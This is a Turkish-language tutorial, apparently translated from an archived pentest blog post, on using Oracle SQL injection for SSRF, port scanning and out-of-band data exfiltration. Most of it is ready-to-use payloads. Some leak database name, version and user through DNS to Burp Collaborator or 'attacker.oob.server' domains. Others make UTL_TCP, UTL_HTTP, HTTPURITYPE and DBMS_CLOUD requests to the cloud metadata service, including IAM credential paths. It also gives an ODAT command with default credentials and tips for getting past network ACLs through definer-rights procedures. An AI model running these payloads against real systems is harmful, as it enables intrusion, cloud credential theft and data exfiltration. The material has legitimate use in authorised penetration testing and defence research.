Oracle injection

Reading time: 9 minutes

Bu gönderiyi https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/ adresindeki silinmiş gönderinin wayback machine kopyasıyla sunun.

SSRF

Oracle kullanarak Out of Band HTTP ve DNS istekleri yapmak iyi belgelenmiştir, ancak bu, enjeksiyonlarda SQL verilerini dışarı sızdırmak için bir yöntemdir. Bu teknikleri/fonksiyonları her zaman diğer SSRF/XSPA'ları yapmak için değiştirebiliriz.

Oracle'ı kurmak gerçekten acı verici olabilir, özellikle de komutları denemek için hızlı bir örnek kurmak istiyorsanız. Appsecco şirketindeki arkadaşım ve meslektaşım Abhisek Datta, bana bir t2.large AWS Ubuntu makinesinde ve Docker'da bir örnek kurmamı sağlayan https://github.com/MaksymBilenko/docker-oracle-12c adresini gösterdi.

Bu blog yazısının süresince Oracle'ı tam ağ erişimi ile yerel bir kurulum olarak taklit edebilmek için --network="host" bayrağı ile docker komutunu çalıştırdım.

docker run -d --network="host" quay.io/maksymbilenko/oracle-12c

URL veya Hostname/Port Numarası belirtimini destekleyen Oracle paketleri

Bir host ve port belirtimini destekleyen paketler ve fonksiyonlar bulmak için, Oracle Database Online Documentation üzerinde bir Google araması yaptım. Özellikle,

site:docs.oracle.com inurl:"/database/121/ARPLS" "host"|"hostname" "port"|"portnum"

Arama aşağıdaki sonuçları döndürdü (hepsi dışa ağ bağlantısı gerçekleştirmek için kullanılamaz)

• DBMS_NETWORK_ACL_ADMIN
• UTL_SMTP
• DBMS_XDB
• DBMS_SCHEDULER
• DBMS_XDB_CONFIG
• DBMS_AQ
• UTL_MAIL
• DBMS_AQELM
• DBMS_NETWORK_ACL_UTILITY
• DBMS_MGD_ID_UTL
• UTL_TCP
• DBMS_MGWADM
• DBMS_STREAMS_ADM
• UTL_HTTP

Bu kaba arama, DBMS_LDAP gibi paketleri açıkça atlıyor (bir ana bilgisayar adı ve port numarası geçişine izin verir) çünkü belgelendirme sayfası sizi farklı bir konuma yönlendiriyor. Bu nedenle, dışa istekler yapmak için kötüye kullanılabilecek başka Oracle paketleri de olabilir, bunları atlamış olabilirim.

Her durumda, keşfettiğimiz ve yukarıda listelediğimiz bazı paketlere bir göz atalım.

DBMS_LDAP.INIT

DBMS_LDAP paketi, LDAP sunucularından veri erişimine olanak tanır. init() fonksiyonu, bir LDAP sunucusuyla bir oturum başlatır ve bir ana bilgisayar adı ve port numarasını argüman olarak alır.

Bu fonksiyon, aşağıdaki gibi DNS üzerinden veri sızdırma gösterimi için daha önce belgelenmiştir.

SELECT DBMS_LDAP.INIT((SELECT version FROM v$instance)||'.'||(SELECT user FROM dual)||'.'||(select name from V$database)||'.'||'d4iqio0n80d5j4yg7mpu6oeif9l09p.burpcollaborator.net',80) FROM dual;

Ancak, fonksiyonun bir ana bilgisayar adı ve bir port numarasını argüman olarak kabul ettiğini göz önünde bulundurursak, bunu bir port tarayıcı gibi çalışmak için de kullanabilirsiniz.

İşte birkaç örnek

SELECT DBMS_LDAP.INIT('scanme.nmap.org',22) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',25) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',80) FROM dual;
SELECT DBMS_LDAP.INIT('scanme.nmap.org',8080) FROM dual;

ORA-31203: DBMS_LDAP: PL/SQL - Init Failed. hatası, portun kapalı olduğunu gösterirken, bir oturum değeri portun açık olduğunu işaret ediyor.

UTL_SMTP

UTL_SMTP paketi, SMTP üzerinden e-posta göndermek için tasarlanmıştır. Oracle belgeleri sitesinde sağlanan örnek, bu paketi kullanarak nasıl e-posta gönderebileceğinizi göstermektedir. Ancak bizim için ilginç olan, bir ana bilgisayar ve port belirtme yeteneğidir.

Aşağıda, 2 saniyelik bir zaman aşımı ile UTL_SMTP.OPEN_CONNECTION fonksiyonu ile basit bir örnek gösterilmektedir.

DECLARE c utl_smtp.connection;
BEGIN
c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',80,2);
END;

DECLARE c utl_smtp.connection;
BEGIN
c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',8080,2);
END;

ORA-29276: transfer timeout açık bir portun olduğunu gösterir ancak SMTP bağlantısı kurulmamıştır, ORA-29278: SMTP transient error: 421 Service not available ise portun kapalı olduğunu gösterir.

UTL_TCP

UTL_TCP paketi ve prosedürleri ile fonksiyonları, hizmetlerle TCP/IP tabanlı iletişim sağlar. Belirli bir hizmet için programlandığında, bu paket ağa giriş yapmak veya tüm Sunucu Tarafı İsteklerini gerçekleştirmek için kolayca bir yol haline gelebilir, çünkü bir TCP/IP bağlantısının tüm yönleri kontrol edilebilir.

Oracle dokümantasyon sitesindeki örnek, bu paketi kullanarak bir web sayfasını almak için ham bir TCP bağlantısı nasıl yapabileceğinizi gösterir. Bunu biraz daha basitleştirip, örneğin metadata örneğine veya keyfi bir TCP/IP hizmetine istek yapmak için kullanabiliriz.

set serveroutput on size 30000;
SET SERVEROUTPUT ON
DECLARE c utl_tcp.connection;
retval pls_integer;
BEGIN
c := utl_tcp.open_connection('169.254.169.254',80,tx_timeout => 2);
retval := utl_tcp.write_line(c, 'GET /latest/meta-data/ HTTP/1.0');
retval := utl_tcp.write_line(c);
BEGIN
LOOP
dbms_output.put_line(utl_tcp.get_line(c, TRUE));
END LOOP;
EXCEPTION
WHEN utl_tcp.end_of_input THEN
NULL;
END;
utl_tcp.close_connection(c);
END;
/

DECLARE c utl_tcp.connection;
retval pls_integer;
BEGIN
c := utl_tcp.open_connection('scanme.nmap.org',22,tx_timeout => 4);
retval := utl_tcp.write_line(c);
BEGIN
LOOP
dbms_output.put_line(utl_tcp.get_line(c, TRUE));
END LOOP;
EXCEPTION
WHEN utl_tcp.end_of_input THEN
NULL;
END;
utl_tcp.close_connection(c);
END;

İlginç bir şekilde, ham TCP istekleri oluşturma yeteneği sayesinde, bu paket tüm bulut sağlayıcılarının Instance meta-veri hizmetine sorgu göndermek için de kullanılabilir, çünkü yöntem türü ve ek başlıklar TCP isteği içinde iletilebilir.

UTL_HTTP ve Web İstekleri

Belki de her Out of Band Oracle SQL Injection eğitiminde en yaygın ve en çok belgelenmiş teknik UTL_HTTP paketi dir. Bu paket, belgelerde şu şekilde tanımlanmıştır - UTL_HTTP paketi, SQL ve PL/SQL'den Hypertext Transfer Protocol (HTTP) çağrıları yapar. HTTP üzerinden İnternetteki verilere erişmek için kullanılabilir.

select UTL_HTTP.request('http://169.254.169.254/latest/meta-data/iam/security-credentials/adminrole') from dual;

Ayrıca, bunu şu tür sorgularla bazı temel port taramaları gerçekleştirmek için de kullanabilirsiniz.

select UTL_HTTP.request('http://scanme.nmap.org:22') from dual;
select UTL_HTTP.request('http://scanme.nmap.org:8080') from dual;
select UTL_HTTP.request('http://scanme.nmap.org:25') from dual;

ORA-12541: TNS:no listener veya TNS:operation timed out hatası, TCP portunun kapalı olduğunun bir işaretiyken, ORA-29263: HTTP protocol error veya veri, portun açık olduğunun bir işareti.

Geçmişte çeşitli başarılarla kullandığım başka bir paket, bir URL ile etkileşimde bulunmanıza ve HTTP protokolünü desteklemenize olanak tanıyan HTTPURITYPE Oracle soyut türünün GETCLOB() yöntemi'dir. GETCLOB() yöntemi, bir URL'den GET yanıtını CLOB veri türü olarak almak için kullanılır.

SELECT HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() FROM dual;

Ek Paketler ve Teknikler (Oracle 19c → 23c)

UTL_INADDR – DNS tabanlı dışa aktarma ve host keşfi

UTL_INADDR, veritabanı sunucusundan dışa doğru bir DNS sorgusu tetikleyen basit ad çözümleme yardımcılarını açığa çıkarır. Sadece bir alan adı gerektiğinden (port/ACL gerekmez) diğer ağ çağrıları engellendiğinde kör dışa aktarma için güvenilir bir ilkelidir.

-- Leak the DB name and current user via a DNS query handled by Burp Collaborator
SELECT UTL_INADDR.get_host_address(
(SELECT name FROM v$database)||'.'||(SELECT user FROM dual)||
'.attacker.oob.server') FROM dual;

get_host_address() çözümlenen IP'yi döndürür (veya çözümleme başarısız olursa ORA-29257 hatası verir). Saldırgan, kodun çalıştığını doğrulamak için kontrol edilen alandaki gelen DNS isteğini izlemek zorundadır.

DBMS_CLOUD.SEND_REQUEST – Otonom/23c üzerinde tam HTTP istemcisi

Son zamanlarda bulut merkezli sürümler (Otonom Veritabanı, 21c/23c, 23ai) DBMS_CLOUD ile birlikte gelir. SEND_REQUEST fonksiyonu, özel fiiller, başlıklar, TLS ve büyük gövdeleri destekleyen genel amaçlı bir HTTP istemcisi olarak işlev görür ve bu da onu klasik UTL_HTTP'den çok daha güçlü hale getirir.

-- Assuming the current user has CREATE CREDENTIAL and network ACL privileges
BEGIN
-- empty credential when no auth is required
DBMS_CLOUD.create_credential(
credential_name => 'NOAUTH',
username        => 'ignored',
password        => 'ignored');
END;
/

DECLARE
resp  DBMS_CLOUD_TYPES.resp;
BEGIN
resp := DBMS_CLOUD.send_request(
credential_name => 'NOAUTH',
uri             => 'http://169.254.169.254/latest/meta-data/',
method          => 'GET',
timeout         => 3);
dbms_output.put_line(DBMS_CLOUD.get_response_text(resp));
END;
/

Çünkü SEND_REQUEST rastgele hedef URI'lerine izin veriyor, SQLi aracılığıyla kötüye kullanılabilir:

1. Dahili port taraması / SSRF bulut meta veri hizmetlerine.
2. HTTPS üzerinden dışarıdan veri sızdırma (Burp Collaborator veya bir ngrok tüneli kullanın).
3. Eski çağrı paketleri ACL'ler tarafından devre dışı bırakıldığında bile saldırgan sunuculara geri çağırmalar.

ℹ️ Eğer sadece klasik bir yerel 19c'ye sahipseniz ama Java saklı prosedürleri oluşturabiliyorsanız, bazen OCI istemci paketi üzerinden DBMS_CLOUD yükleyebilirsiniz — bazı angajmanlarda faydalıdır.

ODAT ile saldırı yüzeyini otomatikleştirme

ODAT – Oracle Database Attacking Tool modern sürümlerle uyumlu kalmıştır (19c, 5.1.1 – Nisan-2022'ye kadar test edilmiştir). –utl_http, –utl_tcp, –httpuritype ve daha yeni –dbms_cloud modülleri otomatik olarak:

• Kullanılabilir çağrı paketlerini/ACL izinlerini tespit eder.
• Kör çıkarım için DNS ve HTTP geri çağırmalarını tetikler.
• Burp/SQLMap için kopyalamaya hazır SQL yükleri oluşturur.

Örnek: varsayılan kimlik bilgileri ile hızlı OOB kontrolü (arka planda ACL numaralandırmasını halleder):

odat all -s 10.10.10.5 -p 1521 -d XE -U SCOTT -P tiger --modules oob

Son ağ ACL kısıtlamaları ve atlatmalar

Oracle, Temmuz 2023 CPU'sunda varsayılan Ağ ACL'lerini sıkılaştırdı — yetkisiz hesaplar artık varsayılan olarak ORA-24247: network access denied by access control list alıyor. İki desen, SQLi aracılığıyla çağrılara izin vermeye devam ediyor:

1. Hedef hesap, bir geliştirici tarafından entegrasyonlar için eklenen bir ACL girişine (DBMS_NETWORK_ACL_ADMIN.create_acl) sahiptir.
2. Saldırgan, zaten AUTHID DEFINER ve gerekli yetkilere sahip olan yüksek ayrıcalıklı bir PL/SQL tanımlayıcı hakları rutinini (örneğin, özel bir uygulamada) kötüye kullanır.

Sömürü sırasında ORA-24247 ile karşılaşırsanız, her zaman yeniden kullanılabilir prosedürler arayın:

SELECT owner, object_name
FROM   dba_objects
WHERE  object_type = 'PROCEDURE'
AND  authid       = 'DEFINER';

(müfettişliklerde en az bir raporlama/ihracat prosedürü gerekli haklara sahipti).

Referanslar

• Oracle Belgeleri – DBMS_CLOUD.SEND_REQUEST paketi tanımı ve örnekleri.
• quentinhardy/odat – Oracle Veritabanı Saldırı Aracı (son sürüm 5.1.1, Nis-2022).